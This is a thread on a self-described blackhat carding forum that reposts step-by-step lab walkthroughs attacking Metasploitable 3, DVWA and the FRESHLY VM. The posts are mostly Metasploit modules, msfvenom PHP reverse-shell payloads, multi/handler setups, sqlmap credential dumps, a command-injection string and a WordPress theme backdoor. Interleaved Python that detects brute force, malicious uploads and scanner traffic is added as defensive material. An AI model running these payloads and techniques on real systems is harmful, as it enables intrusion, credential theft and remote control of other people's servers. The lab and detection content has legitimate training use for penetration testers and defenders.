Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc
[Guide] How to Hack Metasploitable 3 using Elasticsearch Exploit - Printable Version




[Guide] How to Hack Metasploitable 3 using Elasticsearch Exploit - NINZA - 04-25-2020

Elasticsearch is a distributed RESTful search engine used by companies for analytics and search, and here we will learn how to exploit our victim through it. Start off with nmap:
nmap -p- -A 192.168.1.8
[Image: 1.png?w=687&ssl=1]
Nmap gives a splendid result, and in it you can see an HTTP service running on port 9200, which is the Elasticsearch REST interface. Let's search Google for an exploit for it.
[Image: 2.png?w=687&ssl=1]
YES! We have an exploit for that. Let’s use it to our advantage.
[Image: 3.png?w=687&ssl=1]
To use this exploit, go to Metasploit and type:
use exploit/multi/elasticsearch/script_mvel_rce
msf exploit(script_mvel_rce) > set rhost 192.168.1.8
msf exploit(script_mvel_rce) > set rport 9200
msf exploit(script_mvel_rce) > exploit
[Image: 4.png?w=687&ssl=1]

Metasploitable3 is a VM built from the ground up with a large number of security vulnerabilities. It is intended as a target for testing exploits with Metasploit, and hence for brushing up our Metasploit skills.
We already know that our target is Metasploitable 3, so there is no need to discover it. Let's move straight to the nmap scan:
nmap -p- -sV 192.168.1.8
[Image: 1.png?w=687&ssl=1]
We can see that the FTP port is open, so we can attack it; to do so we need a dictionary file with which the login attack can succeed. To make a dictionary file, type the following command (the wiki URL was hidden by the forum):
cewl [URL hidden] -m 7 -d 0 -w /root/Desktop/dict.txt

CeWL is a tool that builds a customized wordlist from a given URL. The above command builds a dictionary file from the Metasploitable3 wiki and might help us find the password.
[Image: 2.png?w=687&ssl=1]
After generating the wordlist with CeWL, open Metasploit by typing msfconsole in a terminal on your Kali machine.
[Image: 3.1.png?w=687&ssl=1]
And then type:
use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set username vagrant
msf auxiliary(ftp_login) > set rhosts 192.168.1.8
msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(ftp_login) > set stop_on_success true
msf auxiliary(ftp_login) > exploit
[Image: 3.png?w=687&ssl=1]
The module above will give you the correct password to go with the username. Once you have it, open WinSCP, enter the target's IP and port number along with the username vagrant and the password vagrant.
[Image: 4.png?w=687&ssl=1]
Then click on the Login button. After logging in you can see the files on the FTP server and use them to your advantage.
[Image: 5.png?w=687&ssl=1]
This is how you can use the FTP port to log in to your victim's PC. Enjoy!
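As an added, defender-side example that is not part of the original post: the ftp_login run above leaves a burst of failed logins for one account from one client, followed by a single success when stop_on_success fires. The script below flags that pattern over constructed vsftpd-style log lines (made up for this example).

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log (vsftpd style, not from any real server): a dictionary
# attack on 'vagrant' from one client that ends in a success, plus a benign user.
SAMPLE_LOG = """\
Sat Apr 25 10:00:01 2020 [pid 2101] [vagrant] FAIL LOGIN: Client "192.168.1.20"
Sat Apr 25 10:00:01 2020 [pid 2102] [vagrant] FAIL LOGIN: Client "192.168.1.20"
Sat Apr 25 10:00:02 2020 [pid 2103] [vagrant] FAIL LOGIN: Client "192.168.1.20"
Sat Apr 25 10:00:02 2020 [pid 2104] [vagrant] FAIL LOGIN: Client "192.168.1.20"
Sat Apr 25 10:00:03 2020 [pid 2105] [vagrant] OK LOGIN: Client "192.168.1.20"
Sat Apr 25 10:05:00 2020 [pid 2106] [alice] FAIL LOGIN: Client "192.168.1.30"
Sat Apr 25 10:05:30 2020 [pid 2107] [alice] OK LOGIN: Client "192.168.1.30"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"$'
)
def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
    return ts, m["user"], m["result"], m["ip"]

def detect_bruteforce(log_text, threshold=4, window_s=60):
    """Alerts keyed by (client ip, user): 'bruteforce' once `threshold` failures
    land inside `window_s` seconds, upgraded to 'success_after_failures' if the
    same client then logs in, which is the signature of a stop_on_success run."""
    recent = defaultdict(deque)   # (ip, user) -> timestamps of recent failures
    alerts = {}
    for raw in log_text.splitlines():
        rec = parse(raw)
        if rec is None:
            continue
        ts, user, result, ip = rec
        key = (ip, user)
        if result == "FAIL":
            q = recent[key]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:   # slide the window
                q.popleft()
            if len(q) >= threshold:
                alerts.setdefault(key, "bruteforce")
        elif alerts.get(key) == "bruteforce":
            alerts[key] = "success_after_failures"
    return alerts
```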

File upload vulnerabilities are a major problem in web-based applications. On many web servers the vulnerability depends entirely on an upload feature that lets an attacker upload a file with malicious code hidden inside, which can then be executed on the server. An attacker might be able to put a phishing page on the website or deface it.
An attacker may also expose the web server's internal information to others, and there is a chance that sensitive data ends up in the hands of unauthorized people.
In DVWA the web page allows the user to upload an image, and the server-side code checks whether the last characters of the file name are '.jpg', '.jpeg' or '.png' before allowing the image to be uploaded into the directory.
Requirement:
Xampp/Wamp Server
DVWA Lab
Kali Linux: Burp suite, metasploit framework
To set up the DVWA lab in your XAMPP or WAMP server, read the full setup article (link hidden by the forum).

Now open DVWA in your browser at your local IP, here 192.168.1.102:81/DVWA, and log in with the following credentials:
Username – admin
Password – password
Bypass Low Level Security
Click on DVWA Security and set the website security level to low.
[Image: 1.png?w=687&ssl=1]
Open a terminal in Kali Linux and create a PHP backdoor with the following command:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Copy and paste the highlighted code into Leafpad and save it with a PHP extension as hack.php on the desktop.
[Image: 2.png?w=687&ssl=1]
Come back to your DVWA lab and click the File Upload option in the vulnerability menu.
Now click the Browse button, select hack.php, and click Upload; this uploads your file into the server's directory.
[Image: 3.png?w=687&ssl=1]
After uploading the PHP file, the page shows the directory path where your file was uploaded. Copy the selected part and paste it into the URL to execute it.
hackable/uploads/hack.php
[Image: 4.png?w=687&ssl=1]
Before opening this URL in the browser, start the multi handler in Metasploit with the commands below. While the multi handler is running, open the URL of the PHP file in the browser. This will give you meterpreter session 1.
192.168.1.102:81/DVWA/hackable/uploads/hack.php
[Image: 5.png?w=687&ssl=1]
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 3333
msf exploit(handler) > run
meterpreter > sysinfo

[Image: 6.png?w=687&ssl=1]
Bypass Medium Level Security
Click on DVWA Security and set the website security level to medium.
[Image: 7.png?w=687&ssl=1]
Same process to create the PHP backdoor:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Now save the selected code as raj.php.jpeg on the desktop, since this file has to be uploaded under medium security, which is a little different from low security in that it apparently checks the file's extension.
[Image: 8.png?w=687&ssl=1]
Come back to your DVWA lab and click the File Upload option in the vulnerability menu.
Again click the Browse button and select raj.php.jpeg to upload it. Now start Burp Suite and turn Intercept on under the Proxy tab. Don't forget to set your browser's manual proxy, then click Upload.
[Image: 9.1.png?w=687&ssl=1]
The Intercept tab catches the POST request when you click the Upload button. Now change raj.php.jpeg to raj.php.
[Image: 9.png?w=687&ssl=1]
Compare the change before forwarding your PHP file. After altering it, click Forward to upload the PHP file into the directory.
[Image: 10.png?w=687&ssl=1]
This shows the directory path where the file was successfully uploaded.
hackable/uploads/raj.php
[Image: 11.png?w=687&ssl=1]
Now repeat the same process as in low security to execute the PHP file via the URL.
192.168.1.102:81/DVWA/hackable/uploads/raj.php
[Image: 12.png?w=687&ssl=1]
This gives meterpreter session 2 when you open the URL in the browser.
meterpreter > sysinfo
[Image: 13.png?w=687&ssl=1]
Bypass High Level Security
Click on DVWA Security and set the website security level to high.
[Image: 14.png?w=687&ssl=1]
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

[Image: 15.png?w=687&ssl=1]
Now save the selected code as shell.jpeg on the desktop. This file has to be uploaded under high security, which differs from low and medium security in that it apparently checks the file's extension as well as a piece of its content; therefore type GIF98 before the PHP code and save the file as shell.jpeg.
[Image: 16.png?w=687&ssl=1]
Repeat the process to browse for shell.jpeg.
[Image: 17.1.png?w=687&ssl=1]
Again you get the directory path of the uploaded file.
[Image: 17.png?w=687&ssl=1]
This PHP file cannot be executed directly via the URL, as it was uploaded with a .jpeg extension. To rename it into a PHP file, click the Command Injection option in the vulnerability menu. This vulnerability lets you copy and rename shell.jpeg into a PHP file. Type the following in the text box; it copies and renames shell.jpeg to aa.php:
| copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php

[Image: 18.png?w=687&ssl=1]
When you submit the command, the PHP file is copied under the new name aa.php.
[Image: 19.png?w=687&ssl=1]
Now repeat the process to execute the PHP file via the URL.
192.168.1.102:81/DVWA/hackable/uploads/aa.php

[Image: 20.1.png?w=687&ssl=1]
Wonderful!! Here we get meterpreter session 3 as well.
meterpreter > sysinfo
[Image: 20.png?w=687&ssl=1]
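An added example that is neither DVWA's code nor part of the original post: the three uploads above (hack.php, raj.php.jpeg, and shell.jpeg with a fake image header) run against a name-only check of the kind the walkthrough defeats, next to a hardened check that requires a single allowed extension, matching magic bytes and no PHP open tag, plus a server-chosen storage name. The file names and bytes are constructed for this example.

```python
import re
import secrets

# Constructed sample uploads mirroring the three cases in the walkthrough above.
PHP_STAGER = b"<?php /* a reverse-shell stager would go here */ ?>"
SAMPLES = {
    "hack.php":     PHP_STAGER,                 # low level: nothing is checked
    "raj.php.jpeg": PHP_STAGER,                 # medium level: double extension
    "shell.jpeg":   b"GIF98" + PHP_STAGER,      # high level: fake header in front
    "photo.jpg":    b"\xff\xd8\xff\xe0" + bytes(16) + b"\xff\xd9",  # real-looking JPEG
}
# Allowed extension -> magic bytes the file body must start with.
ALLOWED = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n"}

def extension_only_check(name, data):
    """The kind of check the walkthrough defeats: it looks only at how the
    file name ends, so raj.php.jpeg and shell.jpeg both pass."""
    return name.lower().rsplit(".", 1)[-1] in ALLOWED

def hardened_check(name, data):
    """Require exactly one allowed extension, magic bytes that match it, and no
    PHP open tag in the body (re-encoding the image server-side is stronger still)."""
    parts = name.lower().split(".")
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]{1,64}", parts[0]):
        return False            # rejects raj.php.jpeg: two extensions
    ext = parts[1]
    if ext not in ALLOWED or not data.startswith(ALLOWED[ext]):
        return False            # rejects hack.php and the GIF98 trick under .jpeg
    if b"<?php" in data:
        return False            # belt and braces against embedded PHP
    return True

def stored_name(name):
    """Server-chosen name for a file that passed hardened_check: the client's
    name never reaches disk. Keep the upload directory outside the web root so
    nothing in it is ever handed to the PHP interpreter, rename tricks included."""
    ext = name.lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"

def screen(name):
    """Convenience wrapper over the constructed samples: (weak verdict, hardened verdict)."""
    data = SAMPLES[name]
    return extension_only_check(name, data), hardened_check(name, data)
```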

Here we come with a new article, all about a penetration testing challenge called FRESHLY. The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. It's an easy lab, so let's get started and access it.
Download from here: (link hidden by the forum)


Breaching Methodology
  • Network Scanning (Nmap)
  • Recon (Nikto)
  • Login Form Based SQL Injection
  • Abusing WordPress
  • Generate PHP Backdoor (Msfvenom)
  • Upload and execute a backdoor
  • Reverse connection (Metasploit)
  • Take root access
Let’s Start!!
To start, we first have to find the IP of FRESHLY. For that, type the netdiscover command in a Kali terminal; it shows every IP present on our network.
Now we have the target IP, 192.168.1.112, so let's scan it with an aggressive scan (-A):
nmap -p- -A 192.168.1.112

[Image: 1.png?w=687&ssl=1]
This shows all the open ports: 80, 8080, 443.
As port 80 is open, we open the target IP in our browser to find our next clue.
[Image: 2.png?w=687&ssl=1]
Next we run Nikto against it. Nikto helps us gather information such as the site's files and the other major things we ought to know about our target. So type: nikto -h [host URL].
[Image: 3.png?w=687&ssl=1]
The scan shows that a login.php page was found, so open it in the browser with the target IP.
[Image: 4.png?w=687&ssl=1]
Since we don't know the exact username and password, we use sqlmap for login-form-based injection to retrieve the database name and login credentials, by executing the following command:
sqlmap -u 'http://192.168.1.112/login.php' --forms --risk=3 --level=5 --dbs

[Image: 5.png?w=687&ssl=1]
From the sqlmap result we learn that the database name is "wordpress8080", so now we use sqlmap again to fetch the username and password from that database:
sqlmap -u 'http://192.168.1.112/login.php' --forms -D wordpress8080 --risk=3 --level=3 --dump-all

[Image: 6.png?w=687&ssl=1]
Alright, we have achieved our first step by finding the user and password for WordPress:
User = admin
Password = SuperSecretPassword

Earlier we already found the open ports, so open one of the ports we haven't used yet in the browser, i.e. 8080.
Cool... see what you have got. Now click on this link and you are all set for the next step.
[Image: 7.png?w=687&ssl=1]
Candy goodness!!!!! It's our WordPress page. So let's move on to the next steps by opening the WordPress login page and entering the credentials we found:
User = admin
Password = SuperSecretPassword

[Image: 8.png?w=687&ssl=1]
Once you have logged in, create the malicious file that you are going to upload. Generate the code with the msfvenom command:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.132 lport=4444 -f raw

Side by side, in another terminal, open Metasploit and run the multi handler.
[Image: 9.png?w=687&ssl=1]
From the generated raw PHP, copy the code from <?php to die(). As we want to read a file on the system, let's put some PHP code in the theme: go to Appearance -> Themes -> 404.php and add the PHP code there so that it gets executed.
[Image: 10.png?w=687&ssl=1]
Meanwhile, return to the Metasploit terminal and wait for the meterpreter session from the multi handler.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.132
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit

In the image below you can observe meterpreter session 1; now start working towards root privileges. To get a proper TTY shell we spawn one with a Python one-liner:
python -c 'import pty;pty.spawn("/bin/bash")'

To get root, we reused the WordPress admin password SuperSecretPassword with su -, which allowed us to escalate privileges.
[Image: 11.png?w=687&ssl=1]
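An added example, not part of the original article: the chain above leaves a distinctive trail in the web server's access log. The triage below runs over constructed Apache combined-format lines (made up here, in the style of the tools' default user agents) and flags the Nikto and sqlmap fingerprints, the POST to the WordPress theme editor, and a 404 hit from the same client shortly afterwards, which is exactly what fires code placed in 404.php.

```python
import re
from datetime import datetime, timedelta

# Constructed access-log lines: scanner, SQL injection, theme edit, then the 404
# that triggers the planted 404.php; the last line is an unrelated benign visitor.
SAMPLE_ACCESS_LOG = """\
192.168.1.132 - - [25/Apr/2020:11:00:01 +0000] "GET /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"
192.168.1.132 - - [25/Apr/2020:11:02:10 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "sqlmap/1.4 (http://sqlmap.org)"
192.168.1.132 - - [25/Apr/2020:11:09:45 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://192.168.1.112:8080/wp-login.php" "Mozilla/5.0"
192.168.1.132 - - [25/Apr/2020:11:11:02 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "http://192.168.1.112:8080/wp-admin/theme-editor.php" "Mozilla/5.0"
192.168.1.132 - - [25/Apr/2020:11:11:30 +0000] "GET /nonexistent-page HTTP/1.1" 404 1024 "-" "Mozilla/5.0"
192.168.1.50 - - [25/Apr/2020:11:12:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
SCANNER_UA = re.compile(r"sqlmap|nikto", re.IGNORECASE)
THEME_EDITOR = "/wp-admin/theme-editor.php"

def triage(log_text, follow_window=timedelta(minutes=10)):
    """Return (ip, tag, path) findings. Tags: scanner_user_agent for sqlmap/Nikto
    fingerprints, theme_editor_write for a POST that edits theme files, and
    404_after_theme_edit for a 404 from the same client within follow_window
    of such a write (a backdoor in 404.php runs on any missing-page request)."""
    findings = []
    last_theme_write = {}   # ip -> time of the most recent theme-editor POST
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, ua = m["ip"], m["path"], m["ua"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if SCANNER_UA.search(ua):
            findings.append((ip, "scanner_user_agent", path))
        if m["method"] == "POST" and path.split("?")[0] == THEME_EDITOR:
            findings.append((ip, "theme_editor_write", path))
            last_theme_write[ip] = ts
        if m["status"] == "404" and ip in last_theme_write \
                and ts - last_theme_write[ip] <= follow_window:
            findings.append((ip, "404_after_theme_edit", path))
    return findings
```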